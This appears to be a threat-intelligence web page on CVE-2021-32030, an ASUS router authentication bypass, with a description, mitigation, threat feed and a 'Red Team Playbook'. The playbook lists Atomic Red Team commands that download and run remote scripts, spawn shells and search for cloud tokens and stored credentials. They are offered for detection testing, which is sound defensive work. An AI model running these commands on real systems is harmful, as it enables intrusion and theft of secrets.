CVE-2021-32030
Overview
This vulnerability is an authentication bypass affecting the administrator application on specific ASUS router firmware versions. The root cause lies in improper handling of remote input where an attacker-supplied null character ('\0') matches the device's default null value during authentication checks. The affected components include the handle_request function in router/httpd/httpd.c and the auth_check function in web_hook.o, which fail to properly validate unauthenticated requests for remote access.
Vulnerability Description
The administrator application on ASUS GT-AC2900 devices before 3.0.0.4.386.42643 and Lyra Mini before 3.0.0.4_384_46630 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator interface. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations. Note: All versions of Lyra Mini and earlier which are unsupported (End-of-Life, EOL) are also affected by this vulnerability, Consumers can mitigate this vulnerability by disabling the remote access features from WAN.
Impact
An attacker can gain unauthorized administrative access to the router's management interface remotely without any authentication or user interaction. This access enables modification of device configurations, interception and manipulation of network traffic, and potential deployment of further attacks within the network. The vulnerability compromises network security and confidentiality by allowing full control over the affected devices' settings and operation.
Solution
ASUS recommends upgrading affected devices to firmware versions 3.0.0.4.386.42643 or later for GT-AC2900 and 3.0.0.4_384_46630 or later for Lyra Mini. Users of unsupported Lyra Mini versions should consider device replacement due to end-of-life status. As a temporary mitigation, disabling remote access features from the WAN interface is advised. Detailed patch instructions and advisories are available on ASUS's official support site and referenced advisories at https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/ and https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability affecting the ASUS GT-AC2900 and Lyra Mini devices is characterized by an authentication bypass flaw that arises from improper handling of user input. Specifically, the issue lies within the processing of remote input, where an attacker can exploit the system by supplying a null character ('\0'). This character inadvertently matches the device's default value in certain contexts, allowing unauthorized users to gain access to the administrator interface without proper authentication. The flaw is rooted in the functions responsible for handling requests and checking authentication, which fail to adequately validate input, thereby exposing sensitive administrative functionalities to malicious actors.
Attack vectors for this vulnerability are particularly concerning due to the nature of remote access capabilities in consumer-grade networking devices. An attacker could leverage this flaw by sending crafted requests to the device over the internet, bypassing authentication mechanisms entirely. This could be executed from any location, provided the device's remote access features are enabled. Once access is gained, an attacker could manipulate configurations, intercept network traffic, or even deploy malware within the local network. The ease of exploitation, combined with the potential for significant control over network settings, makes this vulnerability particularly attractive to cybercriminals.
The real-world impact of this vulnerability is substantial, especially for businesses relying on these devices for their network infrastructure. Unauthorized access to the administrator interface can lead to data breaches, network disruptions, and unauthorized surveillance of sensitive information. For organizations, the repercussions could include financial losses, reputational damage, and potential legal liabilities stemming from data protection regulations. Furthermore, the fact that the Lyra Mini is no longer supported heightens the risk, as users of these devices may not receive critical security updates, leaving them vulnerable to exploitation indefinitely.
To detect and mitigate this vulnerability, organizations should first ensure that they are running the latest firmware versions for the affected devices. Regularly checking for updates is crucial, as manufacturers often release patches to address known vulnerabilities. Additionally, disabling remote access features from the wide area network (WAN) can significantly reduce the attack surface, preventing unauthorized external access. Network monitoring tools can also be employed to detect unusual traffic patterns or unauthorized access attempts, allowing for timely intervention. Organizations should conduct regular security assessments and penetration testing to identify and remediate potential vulnerabilities in their network infrastructure.
In conclusion, the authentication bypass vulnerability in ASUS GT-AC2900 and Lyra Mini devices poses a serious threat to both individual users and organizations. The ease of exploitation and potential consequences underscore the importance of proactive security measures. By staying informed about firmware updates, disabling unnecessary features, and employing robust monitoring practices, users can significantly mitigate the risks associated with this vulnerability. The evolving landscape of cybersecurity threats necessitates a vigilant approach to device management and network security, ensuring that vulnerabilities are addressed before they can be exploited.
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2021-32030, with multiple new detections emerging across diverse network environments. This increase in telemetry coincides with the vulnerability’s recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog, underscoring its elevated priority for federal and private sector defenders. The assignment of a critical CVSS score of 9.8, coupled with an EPSS score nearing certainty of exploitation, signals a heightened risk that adversaries are actively targeting ASUS GT-AC2900 and Lyra Mini routers. Although no new exploit variants have been publicly disclosed, the sharp rise in detection rates suggests that threat actors may be leveraging existing exploit techniques more aggressively or that previously undetected campaigns are now surfacing. This development significantly increases the urgency for defenders to reassess their exposure and monitoring strategies, as the vulnerability’s exploitation potential now translates into a tangible and immediate threat. Consequently, the overall threat level for affected environments should be considered substantially elevated, reflecting both the criticality of the flaw and its growing operational use in the wild.
Update 2 — August 14, 2026
CSURFACE threat intelligence has identified a marked escalation in activity related to CVE-2021-32030, with our telemetry indicating a sustained increase in attempts to exploit the authentication bypass vulnerability on affected ASUS router models. Although no new exploit variants or ransomware affiliations have surfaced, the persistence and growth in exploitation attempts underscore a heightened operational interest by threat actors in leveraging this flaw. The elevated EPSS score, now nearing the maximum percentile, corroborates the increased likelihood of successful exploitation in real-world environments. This trend signals that adversaries may be intensifying reconnaissance and attack campaigns targeting vulnerable devices, raising the risk of unauthorized administrative access. Consequently, the threat level associated with CVE-2021-32030 should be regarded as increasingly severe, necessitating heightened vigilance in monitoring and detection efforts within impacted networks.
Affected Products (2)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Asus | Lyra Mini Firmware | All |
cpe:2.3:o:asus:lyra_mini_firmware:*:*:*:*:*:*:*:*
|
|
|
Asus | Gt-Ac2900 Firmware | All |
cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
31 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-32030 |
| asus.com |
GitHub CVE
|
https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/ |
| github.com |
GitHub CVE
|
https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md |
| atredis.com |
GitHub CVE
|
https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass |
| asus.com |
GitHub CVE
|
https://www.asus.com/us/supportonly/lyra%20mini/helpdesk_bios/ |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2021-32030 |